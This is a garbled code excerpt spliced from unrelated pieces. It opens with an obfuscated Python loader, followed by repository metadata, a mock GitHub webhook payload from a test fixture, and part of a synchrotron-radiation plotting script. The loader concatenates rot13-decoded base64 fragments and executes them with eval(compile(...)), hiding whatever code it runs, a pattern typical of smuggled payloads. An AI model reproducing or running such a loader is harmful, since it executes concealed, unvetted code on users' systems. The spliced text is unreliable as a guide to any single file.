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' joy = '\x72\x6f\x74\x31\x33' trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29') eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))

14,773.7

36,831

0.998626

143

147,737

1,031.706294

0.643357

0.000285

0.000244

0.000325

0.000922

0.000624

0

0.083943

0.000196

147,737

10

36,832

14,773.7

0.914879

0

0.75

0.998836

0.998267

0

1

0

1

0

false

0

0.125

0

0.125

0

1

null

0

1

0

1

null

1

0

7

8e79769015e2dcf3bcb1be6cf51198031e130e3b

19,349

py

Python

tests/sample_data.py

uptick/gitops

f65057ef337a6fe34f3510c889c2284c1fdb7218

[ "BSD-2-Clause" ]

6

2020-05-12T14:58:20.000Z

2022-02-01T09:40:55.000Z

tests/sample_data.py

uptick/gitops

f65057ef337a6fe34f3510c889c2284c1fdb7218

[ "BSD-2-Clause" ]

22

2019-09-04T13:33:12.000Z

2022-03-17T06:05:16.000Z

tests/sample_data.py

uptick/gitops

f65057ef337a6fe34f3510c889c2284c1fdb7218

[ "BSD-2-Clause" ]

null

SAMPLE_GITHUB_PAYLOAD = { "ref": "refs/heads/master", "before": "bef04e58a0001234567890123456789012345678", "after": "af7e458a00012345678901234567890123456789", "created": False, "deleted": False, "forced": False, "base_ref": None, "compare": "https://github.com/user/mock-repo/compare/bef04e58a000...af7e458a0001", "commits": [ { "id": "c099171d00c099171d00c099171d00c099171d00", "tree_id": "74ee1d000074ee1d000074ee1d000074ee1d0000", "distinct": True, "message": "bump test-app-1", "timestamp": "2019-07-18T15:07:37+10:00", "url": ( "https://github.com/user/mock-repo/commit/c099171d00c099171d00c099171d00c099171d00" ), "author": { "name": "Author Fullname", "email": "author@example.com", "username": "authorusername", }, "committer": { "name": "Author Fullname", "email": "author@example.com", "username": "authorusername", }, "added": [], "removed": [], "modified": ["apps/test-app-1/deployment.yml"], } ], "head_commit": { "id": "c099171d00c099171d00c099171d00c099171d00", "tree_id": "74ee1d000074ee1d000074ee1d000074ee1d0000", "distinct": True, "message": "bump test-app-1", "timestamp": "2019-07-18T15:07:37+10:00", "url": "https://github.com/user/mock-repo/commit/c099171d00c099171d00c099171d00c099171d00", "author": { "name": "Author Fullname", "email": "author@example.com", "username": "authorusername", }, "committer": { "name": "Author Fullname", "email": "author@example.com", "username": "authorusername", }, "added": [], "removed": [], "modified": ["apps/test-app-1/deployment.yml"], }, "repository": { "id": 123123123, "node_id": "NODEIDNODEIDNODEIDNODEIDNODEIDN=", "name": "mock-repo", "full_name": "user/mock-repo", "private": True, "owner": { "name": "user", "email": "admin@example.com", "login": "user", "id": 123123123, "node_id": "NODEIDNODEIDNODEIDNODEIDNODEIDNO", "avatar_url": "", "gravatar_id": "", "url": "https://api.github.com/users/user", "html_url": "https://github.com/user", "followers_url": "https://api.github.com/users/user/followers", "following_url": "https://api.github.com/users/user/following{/other_user}", "gists_url": "https://api.github.com/users/user/gists{/gist_id}", "starred_url": "https://api.github.com/users/user/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/user/subscriptions", "organizations_url": "https://api.github.com/users/user/orgs", "repos_url": "https://api.github.com/users/user/repos", "events_url": "https://api.github.com/users/user/events{/privacy}", "received_events_url": "https://api.github.com/users/user/received_events", "type": "Organization", "site_admin": False, }, "html_url": "https://github.com/user/mock-repo", "description": "Kubernetes cluster configuration.", "fork": False, "url": "https://github.com/user/mock-repo", "forks_url": "https://api.github.com/repos/user/mock-repo/forks", "keys_url": "https://api.github.com/repos/user/mock-repo/keys{/key_id}", "collaborators_url": ( "https://api.github.com/repos/user/mock-repo/collaborators{/collaborator}" ), "teams_url": "https://api.github.com/repos/user/mock-repo/teams", "hooks_url": "https://api.github.com/repos/user/mock-repo/hooks", "issue_events_url": "https://api.github.com/repos/user/mock-repo/issues/events{/number}", "events_url": "https://api.github.com/repos/user/mock-repo/events", "assignees_url": "https://api.github.com/repos/user/mock-repo/assignees{/user}", "branches_url": "https://api.github.com/repos/user/mock-repo/branches{/branch}", "tags_url": "https://api.github.com/repos/user/mock-repo/tags", "blobs_url": "https://api.github.com/repos/user/mock-repo/git/blobs{/sha}", "git_tags_url": "https://api.github.com/repos/user/mock-repo/git/tags{/sha}", "git_refs_url": "https://api.github.com/repos/user/mock-repo/git/refs{/sha}", "trees_url": "https://api.github.com/repos/user/mock-repo/git/trees{/sha}", "statuses_url": "https://api.github.com/repos/user/mock-repo/statuses/{sha}", "languages_url": "https://api.github.com/repos/user/mock-repo/languages", "stargazers_url": "https://api.github.com/repos/user/mock-repo/stargazers", "contributors_url": "https://api.github.com/repos/user/mock-repo/contributors", "subscribers_url": "https://api.github.com/repos/user/mock-repo/subscribers", "subscription_url": "https://api.github.com/repos/user/mock-repo/subscription", "commits_url": "https://api.github.com/repos/user/mock-repo/commits{/sha}", "git_commits_url": "https://api.github.com/repos/user/mock-repo/git/commits{/sha}", "comments_url": "https://api.github.com/repos/user/mock-repo/comments{/number}", "issue_comment_url": "https://api.github.com/repos/user/mock-repo/issues/comments{/number}", "contents_url": "https://api.github.com/repos/user/mock-repo/contents/{+path}", "compare_url": "https://api.github.com/repos/user/mock-repo/compare/{base}...{head}", "merges_url": "https://api.github.com/repos/user/mock-repo/merges", "archive_url": "https://api.github.com/repos/user/mock-repo/{archive_format}{/ref}", "downloads_url": "https://api.github.com/repos/user/mock-repo/downloads", "issues_url": "https://api.github.com/repos/user/mock-repo/issues{/number}", "pulls_url": "https://api.github.com/repos/user/mock-repo/pulls{/number}", "milestones_url": "https://api.github.com/repos/user/mock-repo/milestones{/number}", "notifications_url": ( "https://api.github.com/repos/user/mock-repo/notifications{?since,all,participating}" ), "labels_url": "https://api.github.com/repos/user/mock-repo/labels{/name}", "releases_url": "https://api.github.com/repos/user/mock-repo/releases{/id}", "deployments_url": "https://api.github.com/repos/user/mock-repo/deployments", "created_at": 123123, "updated_at": "2019-07-18T05:05:03Z", "pushed_at": 123123, "git_url": "git://github.com/user/mock-repo.git", "ssh_url": "git@github.com:user/mock-repo.git", "clone_url": "https://github.com/user/mock-repo.git", "svn_url": "https://github.com/user/mock-repo", "homepage": "", "size": 2917, "stargazers_count": 0, "watchers_count": 0, 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"type": "User", "site_admin": False, }, } SAMPLE_GITHUB_PAYLOAD_SKIP_MIGRATIONS = { "ref": "refs/heads/master", "before": "bef04e58a0001234567890123456789012345678", "after": "af7e458a00012345678901234567890123456789", "created": False, "deleted": False, "forced": False, "base_ref": None, "compare": "https://github.com/user/mock-repo/compare/bef04e58a000...af7e458a0001", "commits": [ { "id": "c099171d00c099171d00c099171d00c099171d00", "tree_id": "74ee1d000074ee1d000074ee1d000074ee1d0000", "distinct": True, "message": "bump test-app-1 --skip-migrations", "timestamp": "2019-07-18T15:07:37+10:00", "url": ( "https://github.com/user/mock-repo/commit/c099171d00c099171d00c099171d00c099171d00" ), "author": { "name": "Author Fullname", "email": "author@example.com", "username": "authorusername", }, "committer": { "name": "Author Fullname", "email": "author@example.com", "username": "authorusername", }, "added": [], "removed": [], "modified": ["apps/test-app-1/deployment.yml"], } ], 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"collaborators_url": ( "https://api.github.com/repos/user/mock-repo/collaborators{/collaborator}" ), "teams_url": "https://api.github.com/repos/user/mock-repo/teams", "hooks_url": "https://api.github.com/repos/user/mock-repo/hooks", "issue_events_url": "https://api.github.com/repos/user/mock-repo/issues/events{/number}", "events_url": "https://api.github.com/repos/user/mock-repo/events", "assignees_url": "https://api.github.com/repos/user/mock-repo/assignees{/user}", "branches_url": "https://api.github.com/repos/user/mock-repo/branches{/branch}", "tags_url": "https://api.github.com/repos/user/mock-repo/tags", "blobs_url": "https://api.github.com/repos/user/mock-repo/git/blobs{/sha}", "git_tags_url": "https://api.github.com/repos/user/mock-repo/git/tags{/sha}", "git_refs_url": "https://api.github.com/repos/user/mock-repo/git/refs{/sha}", "trees_url": "https://api.github.com/repos/user/mock-repo/git/trees{/sha}", "statuses_url": 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Python

workspaces/SRW/plots.py

srio/paper-transfocators-resources

917d8b4114056f62c84b295579e55bf5f0b56b6b

[ "MIT" ]

1

2021-03-25T15:34:56.000Z

workspaces/SRW/plots.py

srio/paper-transfocators-resources

917d8b4114056f62c84b295579e55bf5f0b56b6b

[ "MIT" ]

null

workspaces/SRW/plots.py

srio/paper-transfocators-resources

917d8b4114056f62c84b295579e55bf5f0b56b6b

[ "MIT" ]

null

#!/bin/python import sys sys.path.insert(0, './srw_python') from srwlib import * import numpy as np import barc4plots.barc4plots as b4pt from scipy.interpolate import interp2d def read_srw_intensity_dat(file_name, bandwidth=1e-3, transmission=1, norm=False): image, mesh = srwl_uti_read_intens_ascii(file_name) image = np.reshape(image, (mesh.ny, mesh.nx)) dx = (mesh.xFin - mesh.xStart)/mesh.nx * 1E3 dy = (mesh.yFin - mesh.yStart)/mesh.ny * 1E3 image = image*dx*dy*bandwidth*transmission/(1e-3) n = 1 if norm is not False: if norm is True: image /= np.amax(image) n = np.amax(image) else: image /= norm n = norm x = np.linspace(mesh.xStart, mesh.xFin, mesh.nx) y = np.linspace(mesh.yStart, mesh.yFin, mesh.ny) return image, x, y, mesh, n def read_srw_phase_dat(file_name, unwrap=False): image, mesh = srwl_uti_read_intens_ascii(file_name) image = np.reshape(image, (mesh.ny, mesh.nx)) if unwrap: image = unwrap_phase(image, wrap_around=False) x = np.linspace(mesh.xStart, mesh.xFin, mesh.nx) y = np.linspace(mesh.yStart, mesh.yFin, mesh.ny) return image, x, y, mesh def get_slice(_image, _x, _y, _coords_x, _coords_y): f = interp2d(_x, _y, _image, kind='linear') if _coords_x == ':': # coords_x = x _integrated = np.zeros(_x.size) _cut = f(_x, _coords_y) _axis = _x # return _cut, _x if _coords_y == ':': # _coords_y = y _integrated = np.zeros(_y.size) _cut = f(_coords_x, _y) _axis = _y for i in range(_integrated.size): _integrated[i] = _cut[i] return _integrated, _axis def plts_analysis_c1(): samples = np.asarray([1, 10, 50, 100, 500, 1000, 2000, 5000, 10000, 25000, 100000]) pk_int = np.zeros(len(samples)) err_rms = np.zeros(len(samples)) err_rms_x = np.zeros(len(samples)) err_rms_y = np.zeros(len(samples)) lista = [ './me_tests/id18_c01_7.0keV_0p001k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_0p010k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_0p050k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_0p100k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_0p500k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_1k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_2k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_5k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_10k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_25k_ME_intensity.dat', './me_tests/id18_c01_7.0keV_100k_ME_intensity.dat', ] img_ref, x, y, mesh, Imax = read_srw_intensity_dat('./me_tests/id18_c01_7.0keV_100k_ME_intensity.dat', norm=False) # I = np.amax(img_ref) cuty_ref, y = get_slice(img_ref, x, y, 0, ':') cutx_ref, x = get_slice(img_ref, x, y, ':', 0) k = 0 for name in lista: print(name) img, x, y, mesh, Imax = read_srw_intensity_dat(name, norm=False) if k == 0: I = np.amax(img) pk_int[k] = np.amax(img/I) err_rms[k] = np.std(100*(img-img_ref)/img_ref) cuty, y = get_slice(img, x, y, 0, ':') cutx, x = get_slice(img, x, y, ':', 0) err_rms_x[k] = np.std(100*(cutx-cutx_ref)/cutx_ref) err_rms_y[k] = np.std(100*(cuty-cuty_ref)/cuty_ref) k+=1 image = b4pt.Image2Plot(pk_int, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 0 image.LineStyle = 'o-' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, 'id18_c01_7p0keV_peak_intensity.pdf', Enable=False, Hold=False) image = b4pt.Image2Plot(err_rms, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', 'std. dev. ($\%$)'] image.FontsSizeScale = 1.1 image.ColorScheme = 1 image.LineStyle = 'o-' image.label = 'full image' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=False) image = b4pt.Image2Plot(err_rms_x, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', 'std. dev. ($\%$)'] image.FontsSizeScale = 1.1 image.ColorScheme = 2 image.LineStyle = 'x-' image.label = 'ver. cut at $x = 0$' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, Enable=False, Hold=True) image = b4pt.Image2Plot(err_rms_y, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', 'std. dev. ($\%$)'] image.FontsSizeScale = 1.1 image.ColorScheme = 3 image.label = 'hor. cut at $y = 0$' image.LineStyle = '^-' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, 'id18_c01_7p0keV_errs.pdf', Enable=True, Hold=True) def plts_analysis_c3(): samples = np.asarray([1, 10, 50, 100, 500, 1000, 2000, 5000, 10000, 25000, 100000]) pk_int = np.zeros(len(samples)) err_rms = np.zeros(len(samples)) err_rms_x = np.zeros(len(samples)) err_rms_y = np.zeros(len(samples)) lista = [ './me_tests/id18_c03_7.0keV_0p001k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_0p010k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_0p050k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_0p100k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_0p500k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_1k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_2k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_5k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_10k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_25k_ME_intensity.dat', './me_tests/id18_c03_7.0keV_100k_ME_intensity.dat', ] img_ref, x, y, mesh, Imax = read_srw_intensity_dat('./me_tests/id18_c03_7.0keV_100k_ME_intensity.dat', norm=False) # I = np.amax(img_ref) cuty_ref, y = get_slice(img_ref, x, y, 0, ':') cutx_ref, x = get_slice(img_ref, x, y, ':', 0) k = 0 for name in lista: print(name) img, x, y, mesh, Imax = read_srw_intensity_dat(name, norm=False) if k == 0: I = np.amax(img) pk_int[k] = np.amax(img/I) err_rms[k] = np.std(100*(img-img_ref)/img_ref) cuty, y = get_slice(img, x, y, 0, ':') cutx, x = get_slice(img, x, y, ':', 0) err_rms_x[k] = np.std(100*(cutx-cutx_ref)/cutx_ref) err_rms_y[k] = np.std(100*(cuty-cuty_ref)/cuty_ref) k+=1 image = b4pt.Image2Plot(pk_int, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', '(a.u.)'] image.FontsSizeScale = 1.1 image.ColorScheme = 0 image.LineStyle = 'o-' image.Scale = 2 image.ax_limits = [0.5, 200000, None, None] image.sort_class() b4pt.plot_1D(image, 'id18_c03_7p0keV_peak_intensity.pdf',Enable=False, Hold=False) image = b4pt.Image2Plot(err_rms, samples) image.LaTex = True image.grid = True image.legends = ['', '(macro-electrons)', 'std. dev. ($\%$)'] image.FontsSizeScale = 1.1 image.ColorScheme = 1 